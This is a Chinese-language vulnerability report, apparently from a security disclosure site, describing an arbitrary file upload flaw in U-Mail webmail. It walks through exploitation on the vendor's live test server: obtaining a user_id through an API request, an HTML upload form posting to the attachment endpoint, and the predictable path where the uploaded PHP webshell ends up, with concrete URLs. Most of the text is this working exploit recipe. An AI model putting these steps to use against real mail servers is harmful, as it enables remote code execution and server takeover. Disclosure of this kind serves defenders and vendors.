### 简要描述:
U-Mail存一处任意文件上传漏洞。
### 详细说明:
先登录官方测试站点:
[<img src="https://images.seebug.org/upload/201405/08204834d1cb069339f75f8b538298eb0ba28395.png" alt="1.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201405/08204834d1cb069339f75f8b538298eb0ba28395.png)
[<img src="https://images.seebug.org/upload/201405/08205739518546a8b7d8943bc4976009afab5e37.png" alt="5.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201405/08205739518546a8b7d8943bc4976009afab5e37.png)
这里登录的账号为:mailtest3721
再获取当前登录用户的user_id
http://mail.comingchina.com/webmail/client/oab/index.php?module=operate&action=member-get&page=1&orderby=&is_reverse=1&keyword=mailtest3721
这里mailtest3721对应的user_id为:78609
[<img src="https://images.seebug.org/upload/201405/082051094cde3a27e6561649dac2e88d2d66f688.png" alt="2.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201405/082051094cde3a27e6561649dac2e88d2d66f688.png)
html exp:
```
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<FORM name=form1 method=post action="http://mail.comingchina.com/webmail/client/mail/index.php?module=operate&action=attach-upload" enctype=multipart/form-data>
上传文件:<input type="file" name="Filedata" size="30">
<INPUT type=submit value=上传 name=Submit>
```
上传后获取"file_id":"13995534500"
[<img src="https://images.seebug.org/upload/201405/08205254c565dc766a256924b714dc48e306f027.png" alt="3.php.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201405/08205254c565dc766a256924b714dc48e306f027.png)
shell地址:
http://mail.comingchina.com/webmail/client/cache/{user_id}/{file_id}.php
这里是:
http://mail.comingchina.com/webmail/client/cache/78609/13995534500.php
[<img src="https://images.seebug.org/upload/201405/08205649c321be81eb137616f04a48069cb7f15e.png" alt="4.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201405/08205649c321be81eb137616f04a48069cb7f15e.png)
### 漏洞证明:
如上
暂无评论